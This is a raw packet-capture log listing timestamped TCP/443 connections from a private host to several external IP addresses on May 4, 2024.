May 4, 2024 09:50:21.913794994 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.913846016 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.924897909 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.936002970 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.936034918 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.936089039 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.936094046 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.936131001 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.946686983 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.956494093 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.956513882 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.956552982 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.956557989 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.956590891 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.966233015 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.976166010 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.979187012 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.979193926 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.985902071 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.985965967 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.985974073 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.000528097 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.000551939 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.000597000 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.000603914 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.000652075 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.010302067 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.045152903 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.045192957 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.045310974 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.045324087 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.045365095 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.049376965 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.057897091 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.057924986 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.057961941 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.057970047 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.058016062 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.065604925 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.073265076 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.073292017 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.073309898 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.073318005 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.075258017 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.080508947 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.080549955 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.080591917 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.080600977 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.087815046 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.087888002 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.087905884 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.095015049 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.095113039 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.095124006 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.102215052 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.102297068 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.102308989 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.109512091 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.109555960 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.109565973 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.120275974 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.120299101 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.120323896 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.120335102 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.120371103 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.127511024 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.134751081 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.134777069 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.134835005 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.134845018 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.134877920 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.141966105 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.149315119 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.149352074 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.149413109 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.149421930 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.149460077 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.156474113 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.163691044 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.163719893 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.163774967 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.163784981 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.163831949 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.170814991 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.177936077 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.179342985 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.179366112 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.184838057 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.187290907 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.187299967 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.191521883 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.192545891 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.192552090 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.198195934 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.199192047 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.199197054 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.208173990 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.208199978 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.208267927 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.208272934 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.208312988 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.214799881 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.221483946 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.221513033 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.221580982 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.221586943 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.221626043 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.225744009 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.229875088 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.229908943 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.229965925 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.229973078 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.230007887 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.233875990 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.237978935 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.238003016 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.238070965 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.238075972 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.238110065 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.242131948 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.242176056 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.242229939 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.242233992 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.246097088 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.247256041 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.247261047 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.250031948 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.251209021 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.251213074 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.254059076 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.255269051 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.255273104 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.257802010 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.259198904 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:22.259202957 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.261598110 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.261683941 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:22.261782885 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:23.194886923 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:23.328604937 CEST	49719	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:23.328639984 CEST	443	49719	142.250.68.68	192.168.2.3
May 4, 2024 09:50:23.569144964 CEST	49718	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:23.569165945 CEST	443	49718	142.250.68.68	192.168.2.3
May 4, 2024 09:50:23.571290970 CEST	49716	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:23.571310997 CEST	443	49716	142.250.68.68	192.168.2.3
May 4, 2024 09:50:23.577362061 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:23.577385902 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:24.831022978 CEST	49725	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:24.831063032 CEST	443	49725	142.250.68.68	192.168.2.3
May 4, 2024 09:50:24.831428051 CEST	49725	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:24.833159924 CEST	49725	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:24.833173990 CEST	443	49725	142.250.68.68	192.168.2.3
May 4, 2024 09:50:25.161891937 CEST	443	49725	142.250.68.68	192.168.2.3
May 4, 2024 09:50:25.168745041 CEST	49725	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:25.168782949 CEST	443	49725	142.250.68.68	192.168.2.3
May 4, 2024 09:50:25.169291973 CEST	443	49725	142.250.68.68	192.168.2.3
May 4, 2024 09:50:25.171185970 CEST	49725	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:25.171319962 CEST	443	49725	142.250.68.68	192.168.2.3
May 4, 2024 09:50:25.255712032 CEST	49725	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:27.656795025 CEST	49726	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:27.656838894 CEST	443	49726	142.250.68.46	192.168.2.3
May 4, 2024 09:50:27.656898022 CEST	49726	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:27.666333914 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:27.666361094 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:27.666419983 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:27.666671991 CEST	49726	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:27.666687965 CEST	443	49726	142.250.68.46	192.168.2.3
May 4, 2024 09:50:27.670022964 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:27.670037031 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:28.000475883 CEST	443	49726	142.250.68.46	192.168.2.3
May 4, 2024 09:50:28.002080917 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:28.145672083 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:28.208792925 CEST	49726	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:28.922075033 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:28.922101974 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:28.922605038 CEST	49726	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:28.922638893 CEST	443	49726	142.250.68.46	192.168.2.3
May 4, 2024 09:50:28.923280954 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:28.923299074 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:28.923353910 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:28.923765898 CEST	443	49726	142.250.68.46	192.168.2.3
May 4, 2024 09:50:28.923789024 CEST	443	49726	142.250.68.46	192.168.2.3
May 4, 2024 09:50:28.923831940 CEST	49726	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:28.929040909 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:28.929173946 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:28.930915117 CEST	49726	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:28.931070089 CEST	443	49726	142.250.68.46	192.168.2.3
May 4, 2024 09:50:28.931678057 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:28.931696892 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.004766941 CEST	49726	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.004803896 CEST	443	49726	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.092573881 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.092612982 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.092641115 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.092668056 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.092672110 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.092706919 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.092739105 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.092758894 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.092763901 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.103677034 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.103745937 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.103765011 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.114761114 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.114866972 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.114888906 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.125848055 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.125916004 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.125938892 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.223504066 CEST	49726	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.251781940 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.251820087 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.251985073 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.252021074 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.252737045 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.257199049 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.268286943 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.268306017 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.268452883 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.268484116 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.270555973 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.279515982 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.290678978 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.290712118 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.290785074 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.290803909 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.290858984 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.302068949 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.312942028 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.312978029 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.313065052 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.313083887 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.313548088 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.324352980 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.334280014 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.334317923 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.334402084 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.334423065 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.334501028 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.344373941 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.354577065 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.354613066 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.354643106 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.354659081 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.354717970 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.364790916 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.375058889 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.375092030 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.375225067 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.375241995 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.375294924 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.385159969 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.411003113 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.411047935 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.411183119 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.411202908 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.411254883 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.415146112 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.423794985 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.423823118 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.423960924 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.423990965 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.424036026 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.431515932 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.448199987 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.448234081 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.448261023 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.448285103 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.448302984 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.448323011 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.448342085 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.448360920 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.454662085 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.462146997 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.462173939 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.462301970 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.462320089 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.462358952 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.469950914 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.477555037 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.477580070 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.477637053 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.477648020 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.477689981 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.485230923 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.489054918 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.489216089 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.489228964 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.496793032 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.496915102 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.496926069 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.504451990 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.504607916 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.504641056 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.512224913 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.512578964 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.512614965 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.519944906 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.520097971 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.520129919 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.527146101 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.527306080 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.527324915 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.534332991 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.534490108 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.534501076 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.541198015 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.541352987 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.541372061 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.554276943 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.554310083 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.554382086 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.554405928 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.554445982 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.560717106 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.566936970 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.566966057 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.567091942 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.567126989 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.567174911 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.573200941 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.576174974 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.576317072 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.576351881 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.582432985 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.582587957 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.582619905 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.588629007 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.588778973 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.588809013 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.592432022 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.592566013 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.592588902 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.596299887 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.596405983 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.596415997 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.600033045 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.600117922 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:29.600161076 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.600178003 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.604938030 CEST	49727	443	192.168.2.3	142.250.68.46
May 4, 2024 09:50:29.604957104 CEST	443	49727	142.250.68.46	192.168.2.3
May 4, 2024 09:50:35.154740095 CEST	443	49725	142.250.68.68	192.168.2.3
May 4, 2024 09:50:35.154812098 CEST	443	49725	142.250.68.68	192.168.2.3
May 4, 2024 09:50:35.154892921 CEST	49725	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:37.390965939 CEST	49732	443	192.168.2.3	104.21.45.138
May 4, 2024 09:50:37.391015053 CEST	443	49732	104.21.45.138	192.168.2.3
May 4, 2024 09:50:37.391086102 CEST	49732	443	192.168.2.3	104.21.45.138
